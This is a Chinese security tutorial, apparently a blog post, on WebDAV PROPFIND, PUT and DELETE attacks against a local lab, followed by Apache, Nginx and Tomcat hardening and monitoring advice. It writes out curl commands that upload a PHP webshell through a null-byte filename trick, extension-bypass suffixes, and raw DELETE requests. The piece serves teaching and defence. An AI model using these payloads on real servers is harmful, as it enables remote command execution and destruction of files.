news 2026/7/8 20:27:42

WebDAV 方法实战:PROPFIND/PUT/DELETE 3类高危操作复现与修复

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
WebDAV 方法实战:PROPFIND/PUT/DELETE 3类高危操作复现与修复

WebDAV 高危操作实战:从信息泄露到文件操控的攻防演练

WebDAV(Web Distributed Authoring and Versioning)作为HTTP协议的扩展,为远程协作编辑和管理文件提供了强大支持,但同时也带来了不容忽视的安全隐患。本文将深入剖析PROPFIND、PUT和DELETE三类高危操作的攻击面,并提供可立即落地的修复方案。

1. WebDAV安全风险全景图

WebDAV协议扩展了标准HTTP方法集,引入了PROPFIND、PROPPATCH、MKCOL、COPY、MOVE、LOCK和UNLOCK等方法。这些方法在设计之初主要考虑功能性需求,却忽视了安全控制机制,导致攻击者可能:

  • 通过PROPFIND获取服务器目录结构
  • 利用PUT方法上传恶意文件
  • 使用DELETE方法破坏关键系统文件
  • 组合MOVE/COPY方法绕过安全限制

典型攻击链示例

1. OPTIONS探测 → 2. PROPFIND信息收集 → 3. PUT上传Webshell → 4. MOVE重命名 → 5. DELETE清除痕迹

2. 本地靶场快速搭建

使用Docker快速构建包含漏洞的测试环境:

# 启动存在WebDAV配置缺陷的Apache容器 docker run -d --name vulnerable-dav \ -p 8080:80 \ -v $(pwd)/webdav:/var/www/html \ -e APACHE_DAV_ENABLE=1 \ -e APACHE_DAV_ALLOW_ALL=1 \ httpd:2.4

验证环境是否就绪:

curl -X OPTIONS http://localhost:8080 -I # 应返回包含DAV头部的响应

3. PROPFIND信息泄露实战

PROPFIND方法允许客户端检索资源属性,攻击者可利用此方法枚举服务器目录结构:

攻击复现步骤

  1. 发送PROPFIND请求探测根目录:
PROPFIND / HTTP/1.1 Host: target.com Depth: 1 Content-Type: application/xml Content-Length: 35 <d:propfind xmlns:d="DAV:"><d:allprop/></d:propfind>
  1. 解析服务器响应,获取文件列表:
<d:multistatus> <d:response> <d:href>/</d:href> <d:propstat> <d:prop> <d:displayname>webapp</d:displayname> <d:getlastmodified>Wed, 15 Jun 2023 08:49:37 GMT</d:getlastmodified> </d:prop> </d:propstat> </d:response> </d:multistatus>

风险评级

  • CVSS评分:5.3(中危)
  • 影响范围:暴露目录结构、备份文件路径、配置文件位置

4. PUT文件上传漏洞利用

当服务器配置允许PUT方法时,攻击者可直接上传任意文件:

攻击复现

# 上传文本文件测试 curl -X PUT http://target.com/uploads/test.txt \ -d "This is a test file" # 上传PHP Webshell(需配合解析漏洞) curl -X PUT http://target.com/uploads/shell.php%00.txt \ -d "<?php system($_GET['cmd']); ?>"

绕过技巧

  • 使用%20空格后缀:shell.php%20
  • 使用特殊字符:shell.php::$DATA
  • 结合MOVE方法:先上传无害文件再重命名

5. DELETE文件删除攻击

DELETE方法允许直接删除服务器资源,可能造成服务中断:

攻击示例

DELETE /config/database.ini HTTP/1.1 Host: target.com

防御难点

  • 缺乏操作审计日志
  • 无回收站机制
  • 可能被用于擦除入侵痕迹

6. 多维度修复方案

Apache配置加固

# 禁用危险方法 <Location "/"> <LimitExcept GET POST HEAD> Require all denied </LimitExcept> # 关闭WebDAV Dav off # 禁用目录列表 Options -Indexes </Location>

Nginx防护配置

location / { if ($request_method !~ ^(GET|HEAD|POST)$ ) { return 405; } # 禁用自动目录索引 autoindex off; # 限制上传文件类型 client_max_body_size 1M; }

Tomcat安全设置

<!-- conf/web.xml --> <security-constraint> <web-resource-collection> <url-pattern>/*</url-pattern> <http-method>PUT</http-method> <http-method>DELETE</http-method> <http-method>PROPFIND</http-method> </web-resource-collection> <auth-constraint /> </security-constraint>

7. 深度防御策略

监控与检测

  • 实时告警非常规HTTP方法请求
  • 记录完整的WebDAV操作日志
  • 部署WAF规则拦截恶意PROPFIND请求

架构优化

客户端 → 反向代理(方法过滤) → 应用服务器(禁用WebDAV) → 文件存储(权限隔离)

应急响应检查清单

  1. 审查服务器OPTIONS响应头
  2. 扫描Web目录下异常文件
  3. 检查最近修改时间的配置文件
  4. 分析Web日志中的PROPFIND/PUT请求

在实际渗透测试中,WebDAV漏洞往往与其他安全问题形成组合攻击。建议定期使用自动化工具扫描,同时结合人工验证确保修复措施生效。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/8 20:27:26

2种支付宝对账方案对比:API直连 vs 无代码平台,5个维度实测

支付宝对账方案深度评测&#xff1a;API直连与无代码平台的5大核心维度实战分析在数字化支付日益普及的今天&#xff0c;企业对账效率直接影响财务运营的流畅度。面对支付宝这一主流支付渠道&#xff0c;技术团队常陷入开发模式的选择困境&#xff1a;是投入资源进行API深度集成…

作者头像 李华
网站建设 2026/7/8 20:25:23

DVWA 靶场 SQL 注入漏洞深度剖析:5 种攻击手法与 3 层防御策略实战

DVWA 靶场 SQL 注入漏洞深度剖析&#xff1a;5 种攻击手法与 3 层防御策略实战在网络安全领域&#xff0c;SQL 注入攻击始终是最常见且最具破坏力的威胁之一。DVWA&#xff08;Damn Vulnerable Web Application&#xff09;作为一个专为安全测试设计的漏洞演练平台&#xff0c;…

作者头像 李华
网站建设 2026/7/8 20:21:59

Unlock-Music音乐解锁工具:5分钟实现跨平台音乐自由播放

Unlock-Music音乐解锁工具&#xff1a;5分钟实现跨平台音乐自由播放 【免费下载链接】unlock-music 在浏览器中解锁加密的音乐文件。原仓库&#xff1a; 1. https://github.com/unlock-music/unlock-music &#xff1b;2. https://git.unlock-music.dev/um/web 项目地址: htt…

作者头像 李华
网站建设 2026/7/8 20:20:56

影刀RPA Excel行列操作:插入、删除、隐藏、调整宽高

影刀RPA Excel行列操作&#xff1a;插入、删除、隐藏、调整宽高 作者&#xff1a;林焱 Excel操作不只是读写单元格数据。很多时候你需要操作行列结构——插入一行新数据、删除空行、隐藏辅助列、调整列宽让内容完整显示、冻结首行方便查看。这些操作在手动使用Excel时很简单&a…

作者头像 李华
网站建设 2026/7/8 20:19:06

【无人机三维路径】基于A星算法实现低空单无人机城市路径规划环境激光雷达仿真 + 3D 占据栅格地图构建附Matlab代码

✅作者简介&#xff1a;热爱科研的Matlab仿真开发者&#xff0c;擅长毕业设计辅导、数学建模、数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。 &#x1f34e; 往期回顾关注个人主页&#xff1a;Matlab科研工作室 &#x1f447; 关注我领取海量matlab电子书…

作者头像 李华